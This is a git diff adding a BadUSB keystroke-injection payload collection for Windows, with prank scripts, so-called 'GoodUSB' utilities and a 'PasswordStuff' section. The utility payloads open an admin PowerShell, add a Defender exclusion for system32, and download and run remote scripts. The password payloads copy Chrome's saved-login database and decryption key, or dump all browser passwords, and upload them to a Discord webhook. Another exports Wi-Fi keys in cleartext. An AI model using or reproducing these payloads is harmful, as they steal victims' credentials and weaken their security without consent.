+DELAY 200 +STRING winword +ENTER +DELAY 1000 +ENTER +DELAY 200 +ALT q +DELAY 300 +STRING options spelling +DELAY 500 +ENTER +DELAY 200 +TAB +DELAY 200 +ENTER +DELAY 200 +STRING and +DELAY 200 +TAB +STRING nad +DELAY 200 +ALT a +DELAY 200 +ENTER +DELAY 200 +SHIFT TAB +DELAY 200 +ENTER +DELAY 200 +ALT F4 +DELAY 200 diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/readme.md new file mode 100644 index 000000000..636560512 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/readme.md @@ -0,0 +1,38 @@ + +# WordPrank +Basically changes the Auto-Correction and makes "and" being corrected to "nad". But you can put any word you want. + +## How to use? + +This script is not plug and play. You need to the following changes: + +- change first word "STRING and" +- change first word to anything you want "STRING nad" + + +## Features + +- open word +- change auto correction + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/justdance.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/justdance.txt new file mode 100644 index 000000000..77cbb7ca9 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/justdance.txt @@ -0,0 +1,26 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Sets volume to 100% and plays "just dance remix". And yes I know, that the Set-Volume command exists twice. It has to be run twice for it to work. +REM Version: 1.0 +REM Category: FUN +DELAY 700 +GUI r +DELAY 650 +STRING powershell Start-Process powershell -Verb runAs +DELAY 650 +ENTER +DELAY 650 +LEFTARROW +DELAY 650 +ENTER +DELAY 650 +STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; } +DELAY 650 +ENTER +DELAY 650 +STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; } +DELAY 650 +ENTER +DELAY 550 +STRING Start-Process -WindowStyle Hidden "https://www.youtube.com/watch?v=7W9IOhk1-z4" +DELAY 500 +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/readme.md new file mode 100644 index 000000000..78baacbf1 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/readme.md @@ -0,0 +1,36 @@ + +# justdance +Sets volume to 100% and plays "just dance remix". And yes I know, that the Set-Volume command exists twice. It has to be run twice for it to work. + +## How to use? + +This script is plug and play. + + +## Features + +- open video +- turn up volume +- maximize window + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/activate_windows.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/activate_windows.txt new file mode 100644 index 000000000..32f7ad2cf --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/activate_windows.txt @@ -0,0 +1,22 @@ +REM Author: 0xlunar +REM Description: Activate Windows permanently with MAS +REM Version: 1.1 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING irm https://massgrave.dev/get | iex +ENTER +DELAY 4000 +STRING 1 +DELAY 500 +STRING 1 +DELAY 500 +STRING 1 diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/readme.md new file mode 100644 index 000000000..b1158fe9d --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/readme.md @@ -0,0 +1,35 @@ + +# activate_windows +Activates Windows using MAS. + +## How to use? + +This script is plug and play. Note that you may need to change the delay to a higher number. + + +## Features + +- open powershell +- download MAS +- activate Windows + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/bloatware_remover.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/bloatware_remover.txt new file mode 100644 index 000000000..7a46e5571 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/bloatware_remover.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D +REM Description: Remove bloatware from your windows computer. +REM Version: 1.0 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/remove_bloatware_regkeys.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/readme.md new file mode 100644 index 000000000..f7aaf61e0 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/readme.md @@ -0,0 +1,36 @@ + +# Bloatware_remover +Removes useless software from your pc. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- download ps1 script +- remove bloatware + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/clear_explorer.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/clear_explorer.txt new file mode 100644 index 000000000..fd3d4c6c8 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/clear_explorer.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D +REM Description: Clear last used items in the explorer app. +REM Version: 1.0 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/clear_last_used_items.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/readme.md new file mode 100644 index 000000000..670d9a5cb --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/readme.md @@ -0,0 +1,36 @@ + +# clear_explorer +Clears the list of the last used items, that you can see in the explorer app. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- download ps1 script +- clear list + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/disable_cortana.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/disable_cortana.txt new file mode 100644 index 000000000..defa13cc1 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/disable_cortana.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D +REM Description: Disable the really annoying Cortana assistant. +REM Version: 1.0 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/disable_cortana.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/readme.md new file mode 100644 index 000000000..4c149c764 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/readme.md @@ -0,0 +1,36 @@ + +# disable_cortana +As the title says, this script will remove the Cortana assistant from windows. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- download ps1 script +- remove cortana + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/enable_cortana.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/enable_cortana.txt new file mode 100644 index 000000000..f5895055e --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/enable_cortana.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D +REM Description: Enables the really annoying Cortana assistant. +REM Version: 1.0 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/enable_cortana.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/readme.md new file mode 100644 index 000000000..86080ad32 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/readme.md @@ -0,0 +1,36 @@ + +# enable_cortana +As the title says, this script will enable the Cortana assistant from windows. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- download ps1 script +- enable cortana + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/readme.md new file mode 100644 index 000000000..5be07da07 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/readme.md @@ -0,0 +1,36 @@ + +# uninstall_onedrive +This script will download a script that will remove the onedrive app from windows. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- download ps1 script +- remove onedrive + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/uninstall_onedrive.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/uninstall_onedrive.txt new file mode 100644 index 000000000..60b6ba78a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/uninstall_onedrive.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D +REM Description: Uninstalls OneDrive. +REM Version: 1.0 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/uninstall_onedrive.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/privacy.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/privacy.txt new file mode 100644 index 000000000..2f9684c37 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/privacy.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D +REM Description: Want to feel the privacy on Windows? +REM Version: 1.0 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/privacy.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/readme.md new file mode 100644 index 000000000..cc7d99704 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/readme.md @@ -0,0 +1,36 @@ + +# privacy +This script will download and execute a large script that removes features that likely do not provide much privacy. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- download ps1 script +- provide privacy + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/readme.md new file mode 100644 index 000000000..bcc7a49be --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/readme.md @@ -0,0 +1,36 @@ + +# win_debloat +This script will uninstall unnecessary and potentially useless apps. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- download ps1 script +- delete useless apps + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/win_debloat.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/win_debloat.txt new file mode 100644 index 000000000..23a085a44 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/win_debloat.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D +REM Description: Debloat windows. +REM Version: 1.0 +REM Category: GoodUSB +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/debloat_windows.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt new file mode 100644 index 000000000..051e30ea9 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt @@ -0,0 +1,22 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Deletes the Microsoft Store +REM Version: 1.0 +REM Category: Fun +DELAY 500 +GUI r +DELAY 300 +REM Start PowerShell as Admin +STRING powershell Start-Process powershell -Verb runAs +DELAY 300 +ENTER +DELAY 500 +LEFTARROW +DELAY 450 +ENTER +DELAY 600 +REM Deletes Microsoft Store +STRING Get-AppxPackage *windowsstore*|Remove-AppxPackage +DELAY 200 +ENTER + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/readme.md new file mode 100644 index 000000000..e3b659c32 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/readme.md @@ -0,0 +1,35 @@ + +# DeleteMicrosoftStore +This script will delete the Microsoft Store. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- remove MS store package + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt new file mode 100644 index 000000000..6dfb6491a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt @@ -0,0 +1,20 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Deletes the Windows Mail app. +REM Version: 1.0 +REM Category: Fun +DELAY 500 +GUI r +DELAY 300 +REM Start PowerShell as Admin +STRING powershell Start-Process powershell -Verb runAs +DELAY 300 +ENTER +DELAY 500 +LEFTARROW +DELAY 450 +ENTER +DELAY 600 +REM Deletes Windows Mail app +STRING AppxPackage Microsoft.windowscommunicationsapps | Remove-AppxPackage +DELAY 200 +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/chrome_passwords_discord.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/chrome_passwords_discord.txt new file mode 100644 index 000000000..c4c86809e --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/chrome_passwords_discord.txt @@ -0,0 +1,26 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Copies the chrome login file and sends it to a discord webhook. +REM Version: 1.0 +REM Category: Passwords +DELAY 500 +WINDOWS d +DELAY 500 +WINDOWS r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 800 +LEFTARROW +ENTER +DELAY 800 +STRING $hookurl='YOUR-DISCORD-WEBHOOK' +DELAY 800 +ENTER +STRING function Upload-Discord {[CmdletBinding()]param([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text)$Body=@{'username'=$env:username;'content'=$text};if (-not([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}if (-not([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}} +ENTER +DELAY 300 +STRING $sourceFile1 = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; $outputFile1 = "$([System.Environment]::GetFolderPath('Desktop'))\output.txt"; Copy-Item $sourceFile1 $outputFile1; Upload-Discord -file $outputFile1 -text ":)"; Remove-Item $outputFile1; $sourceFile2 = "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State"; $outputFile2 = "$([System.Environment]::GetFolderPath('Desktop'))\key.txt"; Copy-Item $sourceFile2 $outputFile2; Upload-Discord -file $outputFile2 -text "Key-File"; Remove-Item $outputFile2 +ENTER +DELAY 1000 +STRING exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md new file mode 100644 index 000000000..35322c8a2 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md @@ -0,0 +1,39 @@ + +# chrome_passwords_discord +Grabs the "key" and "login data" file for google chrome and sends them to a discord webhook. To decrypt please read below. + +## How to use? + +Well this script is kind of plug and play. After the two files ("encryped passwords" and "key.txt") got sent to your webhook, you will have to decrypt the passwords. + +To do this, I have coded a python program that will use the grabbed "key" to decrypt the passwords. + +Get the [program] + + +## Features + +- open powershell +- grab 2 files +- send files to webhook + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + +[program]: https://github.com/UNC0V3R3D/ChromeDecrypter + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt new file mode 100644 index 000000000..ece51065f --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: New script for getting all Webbrowser passwords and sending them to a discord-webhook. +REM Version: 1.0 +REM Category: Passwords +DELAY 500 +WINDOWS d +DELAY 500 +WINDOWS r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 800 +LEFTARROW +ENTER +DELAY 800 +STRING $hookurl = "webhook url here" +ENTER +DELAY 300 +STRING mkdir \temp; cd \temp; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri https://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip; Expand-Archive 7z.zip; .\7z\7za.exe e wbpv.zip; Start-Sleep -Seconds 5; $pass = ConvertTo-SecureString 'wbpv28821@' -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential ('', $pass); Start-Process -FilePath .\WebBrowserPassView.exe -Credential $cred -Wait; Start-Sleep -Seconds 3; $wshell = New-Object -ComObject Wscript.Shell; $wshell.SendKeys('^{A}'); $wshell.SendKeys('^{S}'); Start-Sleep -Seconds 1; $wshell.SendKeys('export'); $wshell.SendKeys('{Tab}'); $wshell.SendKeys('h'); $wshell.SendKeys('{Enter}'); Start-Sleep -Seconds 1; $wshell.SendKeys('%{F4}'); Start-Sleep -Seconds 1; $file = 'C:\temp\export.htm'; function Upload-Discord {[CmdletBinding()] param ([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text); $Body = @{'username' = $env:username; 'content' = $text}; if (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F 'file1=@$file' $hookurl}; }; Upload-Discord -file 'C:\temp\export.htm' -text 'File:' +ENTER + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/readme.md new file mode 100644 index 000000000..b0ac24828 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/readme.md @@ -0,0 +1,38 @@ + +# Show_Saved_Passwords +Shows all saved passwords. + +## How to use? + +This script is not plug and play. You have to make the following changes: + +- change the discord webhook url (Line 16) + + +## Features + +- open powershell +- download webbrowserview.exe +- save passwords from webbrowsers +- send file to discord webhook + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/StealWifiKeys.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/StealWifiKeys.txt new file mode 100644 index 000000000..a1eb96e82 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/StealWifiKeys.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Steals all of the saved Wifi Passwords and stores them into a file. +REM Version: 1.0 +REM Category: Passwords +DELAY 500 +WINDOWS d +DELAY 500 +WINDOWS r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 800 +LEFTARROW +ENTER +DELAY 800 +ALT y +DELAY 500 +GUI UP +DELAY 600 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir 